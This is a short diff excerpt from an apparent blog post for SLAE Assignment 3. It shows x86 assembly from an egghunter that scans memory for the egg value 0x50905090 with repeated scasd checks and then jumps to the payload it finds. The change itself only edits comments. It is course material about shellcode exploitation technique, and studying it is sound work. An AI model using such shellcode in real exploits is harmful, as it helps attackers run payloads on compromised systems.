h3ll0clar1c3/h3ll0clar1c3.github.io/_posts/2020-07-21-SLAE_Assignment_3.md

 	jz next_page		; if EFAULT is encountered, jump back to next_page mov eax, 0x50905090	; move unique egg value into eax mov edi, edx

+	; search for the egg
 	scasd			; search for first 4 byte pattern of the egg jnz next_address

-	scasd			; search for second 4 byte pattern of the egg jnz next_address
+	; search again for 2nd copy of the egg scasd			; search for second 4 byte pattern of the egg jnz next_address
 	jmp edi			; jump to egg payload